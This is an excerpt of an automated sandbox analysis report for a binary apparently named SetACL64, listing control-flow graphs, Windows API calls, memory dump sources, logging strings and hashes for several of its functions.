                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 3507 7ff68684b710-7ff68684b777 call 7ff686829520 call 7ff68684bc40 3510 7ff68684b779-7ff68684b77d 3507->3510 3511 7ff68684b783-7ff68684b78c 3510->3511 3512 7ff68684bba4-7ff68684bbb6 call 7ff686829720 3510->3512 3511->3512 3513 7ff68684b792-7ff68684b7b1 call 7ff68684a350 3511->3513 3517 7ff68684bbb8-7ff68684bbca 3512->3517 3518 7ff68684bbe9-7ff68684bbf7 3512->3518 3513->3512 3523 7ff68684b7b7-7ff68684b81b call 7ff6868621d4 call 7ff686864d90 RegEnumKeyExW 3513->3523 3520 7ff68684bbcc-7ff68684bbdf 3517->3520 3521 7ff68684bbe4 call 7ff6868621a0 3517->3521 3522 7ff68684bbfa-7ff68684bc20 call 7ff686862180 3518->3522 3524 7ff68684bc27-7ff68684bc2c call 7ff6868688fc 3520->3524 3525 7ff68684bbe1 3520->3525 3521->3518 3536 7ff68684b81f-7ff68684b826 3523->3536 3535 7ff68684bc2d-7ff68684bc32 call 7ff6868688fc 3524->3535 3525->3521 3541 7ff68684bc33-7ff68684bc38 call 7ff6868688fc 3535->3541 3538 7ff68684b82c-7ff68684b849 3536->3538 3539 7ff68684b920-7ff68684b92a 3536->3539 3542 7ff68684b850-7ff68684b858 3538->3542 3543 7ff68684b9df-7ff68684b9e9 3539->3543 3544 7ff68684b930-7ff68684b933 3539->3544 3557 7ff68684bc39-7ff68684bc3f call 7ff686833e30 3541->3557 3542->3542 3546 7ff68684b85a-7ff68684b86a call 7ff686833f80 3542->3546 3549 7ff68684b9eb RegCloseKey 3543->3549 3550 7ff68684b9f1-7ff68684ba02 3543->3550 3547 7ff68684b93c-7ff68684b93f 3544->3547 3548 7ff68684b935-7ff68684b93b RegCloseKey 3544->3548 3567 7ff68684b86c-7ff68684b88c 3546->3567 3568 7ff68684b88e-7ff68684b8a6 call 7ff686830360 3546->3568 3553 7ff68684b97d-7ff68684b98f call 7ff686829720 3547->3553 3554 7ff68684b941-7ff68684b956 3547->3554 3548->3547 3549->3550 3555 7ff68684bb07-7ff68684bb0a 3550->3555 3556 7ff68684ba08-7ff68684ba2e 3550->3556 3578 7ff68684b9c6-7ff68684b9da 3553->3578 3579 7ff68684b991-7ff68684b9a3 3553->3579 3559 7ff68684b958-7ff68684b96b 3554->3559 3560 7ff68684b974-7ff68684b97c call 7ff6868621a0 3554->3560 3562 7ff68684bb0c-7ff68684bb21 3555->3562 3563 7ff68684bb48-7ff68684bb5a call 7ff686829720 3555->3563 3556->3557 3561 7ff68684ba34-7ff68684ba3c 3556->3561 3569 7ff68684bc21-7ff68684bc26 call 7ff6868688fc 3559->3569 3570 7ff68684b971 3559->3570 3560->3553 3572 7ff68684ba3e 3561->3572 3573 7ff68684ba41-7ff68684ba67 call 7ff68682aa20 3561->3573 3574 7ff68684bb23-7ff68684bb36 3562->3574 3575 7ff68684bb3f-7ff68684bb47 call 7ff6868621a0 3562->3575 3591 7ff68684bb5c-7ff68684bb6e 3563->3591 3592 7ff68684bb91-7ff68684bba2 3563->3592 3583 7ff68684b8aa-7ff68684b8ae 3567->3583 3568->3583 3569->3524 3570->3560 3572->3573 3604 7ff68684ba6c-7ff68684babe call 7ff68682ac70 call 7ff68684b710 3573->3604 3605 7ff68684ba69 3573->3605 3574->3569 3587 7ff68684bb3c 3574->3587 3575->3563 3578->3522 3589 7ff68684b9a5-7ff68684b9b8 3579->3589 3590 7ff68684b9c1 call 7ff6868621a0 3579->3590 3594 7ff68684b8e6-7ff68684b91b RegEnumKeyExW 3583->3594 3595 7ff68684b8b0-7ff68684b8c6 3583->3595 3587->3575 3589->3524 3598 7ff68684b9be 3589->3598 3590->3578 3600 7ff68684bb8c call 7ff6868621a0 3591->3600 3601 7ff68684bb70-7ff68684bb83 3591->3601 3592->3512 3592->3522 3594->3536 3602 7ff68684b8c8-7ff68684b8db 3595->3602 3603 7ff68684b8e1 call 7ff6868621a0 3595->3603 3598->3590 3600->3592 3601->3524 3607 7ff68684bb89 3601->3607 3602->3535 3602->3603 3603->3594 3613 7ff68684baf6-7ff68684baff 3604->3613 3614 7ff68684bac0-7ff68684bad6 3604->3614 3605->3604 3607->3600 3613->3556 3617 7ff68684bb05 3613->3617 3615 7ff68684bad8-7ff68684baeb 3614->3615 3616 7ff68684baf1 call 7ff6868621a0 3614->3616 3615->3541 3615->3616 3616->3613 3617->3555
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$CloseEnum
                                        • String ID:
                                        • API String ID: 315095564-0
                                        • Opcode ID: a3d853b96546bdb9a2c2abaa2013f1f5933da85cd711577ccb0fd2a482ac2484
                                        • Instruction ID: f17295a7acbb393cbc26fbf098ac0917ac34fda75c2bf7f700e9551725c7babe
                                        • Opcode Fuzzy Hash: a3d853b96546bdb9a2c2abaa2013f1f5933da85cd711577ccb0fd2a482ac2484
                                        • Instruction Fuzzy Hash: AF61A0B2B18B8189E710CB65E4443AD63A6FF88798F000139DF8C97A99DF7DD851C350

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2067211477-0
                                        • Opcode ID: 76804c98ee7f117b6a44088b4c4b934afb96eee452b2a54a362fddb3aa974b5e
                                        • Instruction ID: 4f4e6655c75991c81f382e311add3e66d325f98655b955f22151f194085fd6e3
                                        • Opcode Fuzzy Hash: 76804c98ee7f117b6a44088b4c4b934afb96eee452b2a54a362fddb3aa974b5e
                                        • Instruction Fuzzy Hash: 14217CA1A1D746C7EE14DB65B41C17A62A1BF84B80F040438DB4E8BB65DE3EEC00C720

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CompareString$try_get_function
                                        • String ID: CompareStringEx
                                        • API String ID: 3689094840-2590796910
                                        • Opcode ID: 6cc9a304ba6e9625a3989606c7bdae2d4dc860ba4e45f28530a020498054dd0b
                                        • Instruction ID: 7bfabdca1d66a2a3f9f3a2324ae164c7a885d269652f01ccad6e996147076fdf
                                        • Opcode Fuzzy Hash: 6cc9a304ba6e9625a3989606c7bdae2d4dc860ba4e45f28530a020498054dd0b
                                        • Instruction Fuzzy Hash: 3611F476A08B81C6D760CB56B4402AAB7A5FBC9B94F54413AEE8D83B59CF3DD850CB40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: DefaultUser$LocaleNametry_get_function
                                        • String ID: GetUserDefaultLocaleName
                                        • API String ID: 1828775994-151340334
                                        • Opcode ID: 57af316dea5b7e61cb562d8c11244f2537ddf137142906e3d23b94016c7f79ba
                                        • Instruction ID: 05d9bead7f0838353dfe26d75060d3004569bf9f1f0d959f80ae06c94cb722ba
                                        • Opcode Fuzzy Hash: 57af316dea5b7e61cb562d8c11244f2537ddf137142906e3d23b94016c7f79ba
                                        • Instruction Fuzzy Hash: C5F082D0F0D542D2FB159BA5A6816F85262BF897C4F84503EEA0D86A65CE3E9C44C760
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                        • String ID:
                                        • API String ID: 1321466686-0
                                        • Opcode ID: 5f4e593a57be2922c770aa4019cdb3a40b36742acc247e4d38195dbb756052e0
                                        • Instruction ID: 8e55ef543592d83e15f5f4f303edf39ddf02620efcdaf2e0f01c5c7ed0162edb
                                        • Opcode Fuzzy Hash: 5f4e593a57be2922c770aa4019cdb3a40b36742acc247e4d38195dbb756052e0
                                        • Instruction Fuzzy Hash: 50311CA1A18207C2FA54AB24956A3B923A1BF45784F44407DEB4DC72E7DE6FEC04C271
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: *
                                        • API String ID: 3215553584-163128923
                                        • Opcode ID: fa66ef4454720253ae4a1324ed2750e09e57d66344b9118c59c944b74fb7378b
                                        • Instruction ID: d9db731998cd69f38668c40e0926809cc0251caa76e6e6a7f9c0f6c02a62f5e2
                                        • Opcode Fuzzy Hash: fa66ef4454720253ae4a1324ed2750e09e57d66344b9118c59c944b74fb7378b
                                        • Instruction Fuzzy Hash: FA7183B2968252CAE7685F29805917C3BA6FF05B9CF14013DDB4E832A5DF3ADC61D720
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 3215553584-0
                                        • Opcode ID: 7ee9a919a73c7ad7693c046b3e9b085255df4470bb1e97c6a93af5c9eaf83ccb
                                        • Instruction ID: cb9d928fbc81a6f574a27b2e87fc4c36a9dc7a536c2f28ab6676619084e45aa6
                                        • Opcode Fuzzy Hash: 7ee9a919a73c7ad7693c046b3e9b085255df4470bb1e97c6a93af5c9eaf83ccb
                                        • Instruction Fuzzy Hash: 9331B2F2F1C286C6FE605B15A44427E62A0BF41B90F544138FA6D877D6DEAEEC80C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CriticalLeaveSection
                                        • String ID: %s$CRTCL,
                                        • API String ID: 3988221542-3126492506
                                        • Opcode ID: 984058a0684c820fee82438c3696b1bf70c79d27525573db99da59e1e00725f3
                                        • Instruction ID: c1336558399e9978695b06de419bb5e68287b28f16c2204c8023a805ffc7f616
                                        • Opcode Fuzzy Hash: 984058a0684c820fee82438c3696b1bf70c79d27525573db99da59e1e00725f3
                                        • Instruction Fuzzy Hash: DB218EE1A28A82C0EA14DB15D5593B92762FF40B84F41503DCA0D8B7E6DF6EED89C360
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CriticalLeaveSection
                                        • String ID: %s$WARN ,
                                        • API String ID: 3988221542-3785767073
                                        • Opcode ID: 8215001489b263a33ae11ef63e8d66250099090301e5055772b76e4d05ae3108
                                        • Instruction ID: 94ec21e71a35c75c73d903f0950ca0891fd00adfc18471546a05abaf0d527c39
                                        • Opcode Fuzzy Hash: 8215001489b263a33ae11ef63e8d66250099090301e5055772b76e4d05ae3108
                                        • Instruction Fuzzy Hash: 9E218EE1A28A82C0EA14DB15D5593B92762FF40B84F41503DCA0D8B7E6DF6EED89C360
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CriticalLeaveSection
                                        • String ID: %s$ERROR,
                                        • API String ID: 3988221542-2486372128
                                        • Opcode ID: fb135519248cd7f04a09e43bd04ed0a4edcf3838c157fd2ce0e7584ffd020449
                                        • Instruction ID: 6f97fc8dcd2a94427c30544f1ea6cf847d3ce5060d0428e265c58a7bdcc3ba64
                                        • Opcode Fuzzy Hash: fb135519248cd7f04a09e43bd04ed0a4edcf3838c157fd2ce0e7584ffd020449
                                        • Instruction Fuzzy Hash: 3C218EE1A28A82C0FA14DB15D5593B92762FF40B84F41503DCA0D8B7E6DF6EED89C360
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CriticalLeaveSection
                                        • String ID: %s$NONE ,
                                        • API String ID: 3988221542-1825952341
                                        • Opcode ID: 4f68964d466b64e016808783c6b282a6dc1bb05c72728e6bf54c9f41982cb742
                                        • Instruction ID: a39bc4c2b0b0eec86f14d6d8857a5336f15b75a23feaa9da804d6cfe7f99d67d
                                        • Opcode Fuzzy Hash: 4f68964d466b64e016808783c6b282a6dc1bb05c72728e6bf54c9f41982cb742
                                        • Instruction Fuzzy Hash: 0A215EE2A28A82C0EA14DB55D5593B92762FF40B84F415039CA0D8B7E6DF7EED85C360
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CriticalLeaveSection
                                        • String ID: %s$DEBUG,
                                        • API String ID: 3988221542-4222748730
                                        • Opcode ID: 5578c2daa3c5bd8fe1d9a90197abb313d44aa39db796cfcd1e657dbf23e1760e
                                        • Instruction ID: c896ced5c6946f9d38d80ba34c12e247d80a2698bd2acdc86c964ed8d9fd544f
                                        • Opcode Fuzzy Hash: 5578c2daa3c5bd8fe1d9a90197abb313d44aa39db796cfcd1e657dbf23e1760e
                                        • Instruction Fuzzy Hash: AD215EE1A28A82C0EA14DB55D5593B92762FF40B84F415039CA0D8B7E6DF7EED85C360
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CriticalLeaveSection
                                        • String ID: %s$INFO ,
                                        • API String ID: 3988221542-2224252516
                                        • Opcode ID: a4deadb17dcfd970735e71189be630700e0c81ec6e5d9d4b59823830e63e97e8
                                        • Instruction ID: 7bbc6948b846f3cf8d721f176df0d063582e63bbddc437c88f266e96b764c0b2
                                        • Opcode Fuzzy Hash: a4deadb17dcfd970735e71189be630700e0c81ec6e5d9d4b59823830e63e97e8
                                        • Instruction Fuzzy Hash: 27215EE1A28A82C0EA14DB55D5593B92762FF40B84F415039CA0D8B7E6DF7EED85C360
                                        APIs
                                          • Part of subcall function 00007FF686873FE0: GetLastError.KERNEL32(?,?,00005D604750197C,00007FF68686E201,?,?,?,?,00007FF68687BCFA,?,?,00000000,00007FF68687D70B,?,?,?), ref: 00007FF686873FEF
                                          • Part of subcall function 00007FF686873FE0: SetLastError.KERNEL32(?,?,00005D604750197C,00007FF68686E201,?,?,?,?,00007FF68687BCFA,?,?,00000000,00007FF68687D70B,?,?,?), ref: 00007FF68687408D
                                        • CloseHandle.KERNEL32(?,?,00000000,00007FF68686E709,?,?,?,?,00007FF68683EA35), ref: 00007FF68686E5A3
                                        • FreeLibraryAndExitThread.KERNELBASE(?,?,00000000,00007FF68686E709,?,?,?,?,00007FF68683EA35), ref: 00007FF68686E5B9
                                          • Part of subcall function 00007FF686878230: try_get_function.LIBVCRUNTIME ref: 00007FF68687824E
                                        • ExitThread.KERNEL32 ref: 00007FF68686E5C2
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorExitLastThread$CloseFreeHandleLibrarytry_get_function
                                        • String ID:
                                        • API String ID: 1393601959-0
                                        • Opcode ID: 1314125dbc08a1527b8b45cc3709738042c2a60f08861b77101480d1199f923b
                                        • Instruction ID: dceb4f7df0669c43fef2206f225f772f35979a768d0fad60ad255de6074ecd47
                                        • Opcode Fuzzy Hash: 1314125dbc08a1527b8b45cc3709738042c2a60f08861b77101480d1199f923b
                                        • Instruction Fuzzy Hash: 67F03CA1A18A86C2EE145B20905C27C22A5BF84B74F184B3DD73C822E5EF2ADC45C360
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: cc89c5ebab4446ecbbafaabbd929ad7d895e51dc1ae703ba52595f57cde5059a
                                        • Instruction ID: 59e18a4ca02535f3c5dba18bf09c991be50c26cd87ed0e2f0125d46d8ed3415a
                                        • Opcode Fuzzy Hash: cc89c5ebab4446ecbbafaabbd929ad7d895e51dc1ae703ba52595f57cde5059a
                                        • Instruction Fuzzy Hash: CBE0B860B54705C7E654672598956792262BFC8741F10943DC44E86373DD3FEC55C321
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn
                                        • String ID: StartLoggerThreadProc: arg0==NULL
                                        • API String ID: 3668304517-2114133805
                                        • Opcode ID: 701121a5653b672ea9e41aef133949d4364fef49f6e0b0740102384dee600f90
                                        • Instruction ID: 7edb4b9a5cd49bb666634ed739816f073caee6d0955240fc4cf68ce4c92b7050
                                        • Opcode Fuzzy Hash: 701121a5653b672ea9e41aef133949d4364fef49f6e0b0740102384dee600f90
                                        • Instruction Fuzzy Hash: 624131A2714686C2EF049F29E59D36D6362FF40B88F90443ADB4D4766ADF6ED880C354
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
